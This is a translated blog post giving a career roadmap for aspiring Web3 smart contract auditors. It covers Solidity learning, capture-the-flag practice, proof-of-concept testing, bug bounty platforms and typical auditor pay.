How to become a Web3 Smart Contract Auditor

2023-04-04 14:00

Read this article in 12 Minutes

AI summary

View the summary

Original article author: 0xNorman

In this blog, we will explore how to become a professional smart contract auditor from scratch. Our goal is to provide an easy-to-understand and professional guide for developers interested in working in the security field as well as the general public.

Why is blockchain security so important?

Blockchain technology is decentralized, immutable and transparent, which gives it a wide range of application prospects in finance, Internet of things, supply chain and other fields. However, with the wide application of blockchain technology, its security problems have become increasingly prominent. As one of the core components of blockchain, the security of smart contract is crucial to the stable operation of the whole system. The DAO attack, in which $150 million worth of ether was stolen due to a flaw in a smart contract, was a prime example. Therefore, becoming a smart contract auditor can not only contribute to the blockchain industry, but also have high financial rewards.

Learn programming and Solidity

If you don't already know how to program, it's best to learn straight from Solidity. Crypto Zombies is a good tutorial to get you started.

Attend training camps and competitions

Attend Secureum BootCamp, complete quizzes and enter monthly contests to test your knowledge to the fullest. In The meantime, you can also learn Solidity and Ethereum safety in a hands-on way by participating in Capture the Flag contests such as Damn Vulnerable DeFi, Ethernaut and Capture The Ether.

Deploy and test smart contracts

Deploy and test smart contracts on a test network. You can write, deploy, and test Solidity code online using the Remix IDE, or refer to the examples on the Solidity by Example website to learn from (in parallel, of course). In addition, you can practice using popular development frameworks such as Hardhat and Foundry. These tools are very important for your PoC (Proof of Concept) during the audit process. PoC (Proof of Concept) is a method to verify the existence and impact of vulnerabilities, which usually involves writing test cases against the target smart contract to simulate the behavior of potential attackers. This way, you can be sure that your findings are conclusive and that you can quantify the potential impact. To create an effective PoC, you need to write appropriate test cases based on the type of vulnerability you find. This might include interacting with the target contract to trigger unusual behavior, checking for expected state changes, or attempting to replicate a known attack. Once your test case has successfully demonstrated the existence of a vulnerability, you can submit this information along with your other audit results to help clients understand and resolve potential security issues.

Familiar with ERC standards and decentralized financial protocols

Be familiar with popular ERC standards such as ERC20 (which stands for universal tradable tokens such as USDT, DAI, etc.), 721 (which stands for non-homogeneous tokens i.e. NFT, such as CryptoKitties, etc.), 777 (an improved ERC20 standard, Support for the recipient's contract to operate), 1155 (which stands for multiple tokens, allowing multiple tokens to be managed in a single contract), and 4626 (a proposal for Ethereum pre-licensed payments). Also, learn about decentralized financial protocols such as Uniswap, a decentralized trading platform that allows users to exchange tokens without trusting a third party, and Compound, a decentralized lending platform that allows users to borrow cryptocurrencies. These contracts and agreements are widely used in real-world projects, so it is important for auditors to understand how they work and how they are implemented.

Learn token economics and business logic

Understanding the economics of tokens is important for smart contract auditors because it helps you understand the economic dynamics and logic behind the actual business. By learning how to design and analyze a token economy model, you will be able to better understand what smart contracts are designed for and the potential problems. To learn about token economics, you can read a number of blogs, websites, and research reports on the subject. For example, the Token Economy blog provides in-depth articles on the token economy, covering aspects of token design, value capture, distribution, and incentives. In addition, you can follow websites such as CoinGecko and CoinMarketCap for market behavior and fundamental analysis of various cryptocurrencies.

Practical experience

Get hands-on experience with Sherlock and Code4rena, and get certified to gain access to private auditing. You can also apply to join yAcademy to learn from top auditors. Look for security issues in real projects by participating in Immunefi's Bug Bounty program or Code4rena's audit contest.

Keep reading audit reports and vulnerability analysis

Read audit reports from Code4rena and top audit firms such as OpenZeppelin, Trail of Bits, Consensys, and Slow Fog Technologies to build your vulnerability data set. Read recent vulnerability analysis (such as the Euler Finace hack) to stay up to date on security incidents and attack techniques.

Build a personal brand and network

Build your brand by ranking in the C4 rankings, conducting private audits and working with clients to contribute to the security community. At the same time, take an active part in community discussions and events to share your knowledge and experience and enhance your personal reputation.

Additional content:Learning Huff (EVM assembly language), becoming familiar with EVM, and contributing to open source auditing tools An in-depth understanding of the underlying technology can help you audit smart contracts more fully. Learning Huff, an EVM assembly language, will give you a deeper understanding of how EVM (Ethereum virtual Machine) works. In addition, contributing to open source auditing tools such as Slither and Echidna can increase your technical capabilities and influence in the security field, as well as help you network with industry experts and expand your network. Formal validation is a powerful tool that can help auditors ensure that smart contracts are secure and correct. It uses mathematical methods to verify that contract behavior conforms to expected norms. Certora is a platform that provides formal verification services that help auditors automatically identify potential security vulnerabilities and functional bugs. By incorporating formal verification into the audit process, you can improve audit quality, reduce human error, and build client trust in the audit results.

Q&A

How to keep up with the latest developments in the security field?

Follow notifications on Twitter in real time, or if you only want to read one roundups per week, subscribe to the BlockThreat Newsletter by iphelix.

How much do auditors get paid?

While I'm not an expert, I think the hourly rate for auditors is something like this:

Beginner: $100 / hour

Experienced: $100- $250 / hour

Top auditor: $250-1000 / hr

I've divided compensation into two categories:

Fixed rate: You are paid at a fixed (hourly) rate

Skills-based pay: The more bugs you find or the more serious they are, the more you get paid.

If you are a junior auditor, I recommend joining an audit firm. If you're at the other end of the skill curve, the opportunity to pursue the latter pay model is more lucrative. It's important to note that top bug bounty hunters can earn much higher payouts, which can amount to millions of dollars, for finding critical bugs. Follow the roadmap in this blog and you will be on your way to becoming a successful smart contract auditor. In the process, you will not only learn to identify and guard against security vulnerabilities, but also be able to contribute to the security and sustainable development of the blockchain industry. Remember, don't get caught up in self-DOS and endless tutorial loops, you'll only really learn if you do. Best of luck in your career as a smart contract auditor!